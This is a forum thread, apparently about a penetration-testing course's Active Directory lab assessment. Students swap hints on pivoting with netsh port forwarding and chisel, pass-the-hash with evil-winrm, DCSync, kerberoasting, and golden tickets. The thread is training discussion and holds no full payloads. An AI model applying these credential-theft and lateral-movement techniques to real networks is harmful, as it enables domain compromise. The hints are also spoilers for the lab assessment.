MVP! I hate this webshell thanks so much.
Hey again cheekychimp,
Was wondering if you were able to get PowerView.ps1 working?
I’m trying to use Get-DomainUser but end up with a “The term 'Get-DomainUser is not recognized as the name of a cmdlet, function…”
If i use -Force, i get an error “Cannot bind argument to parameter ‘Type’ because it is null”.
Would appreciate some help!
Hi @cooljagdash - I did get it working, from MS01. If you follow the hints from Jinn and then copy and paste the PowerVIew.ps1 file onto the machine, that usually worked for me. Sometimes when copying and pasting files it seemed to block them, so I waited 5-6 minutes then moved them across.
@cheekychimp - The strange thing is that i do have RDP access from pwnbox to MS01 while having WEB-WIN01 acting as pivot to redirect RDP traffic to MS01.
Where did you get PowerView.ps1? From /usr/share/…/… ?
I’ll have to try again, maybe i’m missing something small
I downloaded PowerView from the net, just double checked it was the right one. Then followed what Jinn said to do - which lets you RDP and Copy over the files you download. Made sure I waited 5-6 minutes then copied across PowerView and it worked.
I’m just trying to do the DCSync and finish the task.
Thanks cheekychimp, your tip worked (waiting 5-6 minutes).
Turns out, I didn’t need to use PowerView.ps1 to complete this assessment.
Due to this issue I was forced to not use PowerView, but it would’ve been helpful and speed things up.
I also managed to successfully do the DCSync,
Let me know if you need any help with this.
Anyone able to assist? I have the administrator hash but can not pass it for some reason.
Hey Mike, here’s what i did once i have the Administrator NTLM hash:
I used netsh.exe on 10.129.xxx.xxx to listen for packets on port 8001 and send them to DC01 on port 5985.
Then i used PTH attack with evil-winrm to connect to 10.129.xxx.xxx on port 8001. Once 10.129.xxx.xxx receives the packets on that port, it will forward to DC01, allowing me to connect to DC01.
The port forwarding module on Pen tester path explains this.
I was able to get in using psexec.py on kali. I aleady had a tunnel using chisel. Thans anyway. I will probably go back and try your method.
Moving on to Assesment 2 for now.
I finished Assessment 1. But I really wanted to use a golden ticket with impacket-ticketer. I kept getting
socket error or timeout! [Errno 111] Connection refused
If anyone managed to accomplish this, can you PM me with the command string you used?
Dude. Sick find with turning on RDP via registry.
Made it through with golden ticket, this helped a lot
A little helpfor everyone. Everything is mostly in this thread. First, get rid of the webshell, it’ll make things a lot easier. @CrazyHorse302 gave a good link for this. Then you’ll have to find new user and get its creds. lil hash cracking will do. Now you have to pivot. @jinn made it easy for me, but there are other ways. You can pass cmds 1 and 4 straight form webshell or stable shell and then cmd 5. Don’t forget you need to bring your tools along the way too.
Here it starts to be a little more difficult on box 2. Find the user with intereting privileges. Impersonate and attack the DC to dig deeper. The interesting account is an obvious one. As I said in my message up there, I used gold ticket to get full compromise. the link will help.
Also this can help if you’re lost a little https://www.thehacker.recipes/ad/movement/kerberos
Good walkthrough. I was trying to get it to work using impacket. I haven’t had any notable issues getting a golden ticket via mimikatz.
A hint for kerberoasting user svc_sql, do I need to conver base64 blob? am I on the right track?
thank you for your time.
hi , im stuck at Q4 AD skill assessment I. I dont know how to connect to MS01. Can you help me? thank you
I think you helped me with pivot skill assessment too xD. Thank you for saving my life again